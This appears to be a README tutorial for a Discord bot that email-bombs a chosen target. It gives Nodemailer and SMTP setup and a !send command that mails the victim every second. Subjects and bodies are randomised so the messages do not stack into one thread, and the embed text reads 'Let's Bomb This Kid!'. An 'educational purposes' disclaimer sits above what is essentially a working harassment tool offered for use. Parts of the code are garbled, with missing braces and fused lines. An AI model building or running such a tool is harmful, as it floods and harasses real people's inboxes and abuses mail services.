This bot is against Discord ToS and can get you banned for using it!
I'm not responsible for anything that is done/happens with this source code.
This code is strictly for educational purposes.
By copying or using any of the code below you agree that you have read this.
Use this at your own risk
Please do not edit the credits!
Bot Created by Silvano#9542
Email Bombing Video
Email Bombing V2 Video
For any issue, join this discord server
Version 2 - Edited the spamming delay time, now you can choose the mail text, free account for spamming given. Check indexV2.js
Version 1 - Bot Created
With this bot, you can bomb any email address by running a simple command.
The E-mail subject and body will be randomized in all new mails, so there is not any chance that a new mail is a reply to the first.
All this complex system is activated by the simple command !send
First, we need to install Nodemailer using npm
npm install nodemailer --save
Now we need to declare nodemailer at the bottom of our code and a boolean called "spamming" that will be used later in the code
const Discord = require('discord.js');
const client = new Discord.Client();
const prefix = "!"
const nodemailer = require("nodemailer");
var spamming;
It's time to start coding, you can find the whole code in index.js or follow this guide to create your own.
In this bit of code we declare args and some other stuff that is required on the message event.
client.on('message', async msg => {
var args = msg.content.split(' ').slice(1);
var command = msg.content.toLowerCase().slice(prefix.length).split(' ')[0];
if( return;
We need to create our send command and make a function to randomize the emails to avoid duplicates.
Duplicates are bad because it will stack in the inbox and not be effective.
if (command === 'send') {
if (spamming == true) return msg.reply("A mail bombing is already active! Please use '!stop' before a new attack"); //Check if the spamming variable is true
if (!args[0])
return msg.reply("You need to insert a mail target!"); //If email is not specified, you get this reply message.
function randomLetters(length) { //Here you create your random letters and number function.
var text = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < length; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
var mailto = args[0] //the variable mailto will be the arg[0] (the target e-mail)
var mailtxt = (randomLetters(10)) //The mail's text will be 10 random letters and numbers choosed by the var "possible"
Now let's create the connection with the smtp server
WARNING: If you are using gmail under user and pass you put the email and password. YOU MUST HAVE LESS SECURE APPS ON TO USE GMAIL!
let transporter = nodemailer.createTransport({
host: "server", //smtp server
port: 25,
secure: false, // true for 465, false for other ports
auth: {
user: 'mail',
pass: 'password'
And now we make the config for the emails
let mailOptions = {
from: '"Name" <e-mail>', // sender address
to: mailto, // list of receivers, in this case, the "mailto" variable
subject: (randomLetters(8)), // Subject is made by 8 random characters
text: mailtxt, // text body, made from mailtxt variable
html: "<b>" + mailtxt + "</b>" // html body
Here is where we make our spam functions and setInterval to make it keep spamming.
async function sendMail() {
let info = await transporter.sendMail(mailOptions) //You load the mail options
spamming = true; //You set the variable "spamming" to true, when it's on true, you can't launch other attacks
const spammingMessage = setInterval(() => { //You make a loop of the command, so it spams over and over
var mailto = args[0]
mailOptions.subject = (randomLetters(8)) //You change the mail object, so it's everytime a new email and not a reply to the first one
var mailtxt = (randomLetters(10))
}, 1000);{embed: { //You create an embed with all the informations
color: 3447003,
author: {
name: client.user.username,
icon_url: client.user.avatarURL
title: "Bombing",
description: "Bot Developed By Silvano#8106",
fields: [{
name: "Let's Bomb This Kid!",
value: "Bombing In Progress..."
name: "Target Mail",
value: mailto,
timestamp: new Date(),
footer: {
icon_url: client.user.avatarURL,
text: "© Discord Mail Bomber"
The stop command:
if(command === "stop") { //Stop the mail bombing
if (spamming == false) return msg.reply("There isn't any active bombing!") //if you are not spamming, you can't stop the mail bombing."Stopped! Bot Shutdown")
client.destroy() //The bot shut down
All the information about the bot and the developers.
if(command === "info") { //Please do not edit this{embed: {
color: 3447003,
author: {
name: client.user.username,
icon_url: client.user.avatarURL
title: "Info",
description: 'Bot developed by Silvano#8106'+'\n'+'Special Thanks To: ' + 'Exploit#1337',
fields: [{
name: "Find Me On Github!",
value: "[Click This]("
name: "The bot is open source on github!",
value: "[Click This]("
name: "Command Sytax",
value: "!send text"
name: "Stop",
value: "Use !stop for stopping the mail bombing"
timestamp: new Date(),
footer: {
icon_url: client.user.avatarURL,
text: "© Discord Mail Bomber"